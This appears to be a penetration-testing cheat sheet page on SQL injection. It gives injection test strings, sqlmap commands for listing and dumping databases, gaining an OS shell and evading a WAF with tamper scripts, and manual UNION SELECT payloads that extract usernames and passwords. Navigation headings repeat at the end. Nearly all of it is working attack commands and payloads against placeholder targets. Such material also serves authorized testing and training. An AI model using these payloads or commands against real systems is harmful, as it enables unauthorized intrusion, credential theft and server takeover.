SQL Injection

Detection

Test with single quotes and boolean conditions: a syntax error or changed response confirms the injection point.

' OR '1'='1
' OR 1=1--
") OR ("1"="1
') OR ('1'='1

sqlmap

Let sqlmap automate discovery and extraction: use -r with a saved Burp request for the cleanest results.

bash

# Basic
sqlmap -u "http://<IP>/page?id=1" --batch

# POST
sqlmap -u "http://<IP>/login" --data="user=admin&pass=test" --batch

# From Burp request
sqlmap -r request.txt --batch

# Dump
sqlmap -u "http://<IP>/page?id=1" --dbs --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> --tables --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> -T <table> --dump --batch

# OS shell
sqlmap -u "http://<IP>/page?id=1" --os-shell --batch

# WAF bypass
sqlmap -u "http://<IP>/page?id=1" --tamper=space2comment --batch

Manual Union-Based

Determine the column count with ORDER BY, then use UNION SELECT to extract data: null-fill until the count matches.

sql

ORDER BY 1--
ORDER BY 2--
UNION SELECT NULL,NULL,NULL--
UNION SELECT username,password,NULL FROM users--

SQL Injection ​

Detection ​

sqlmap ​

Manual Union-Based ​

SQL Injection

Detection

sqlmap

Manual Union-Based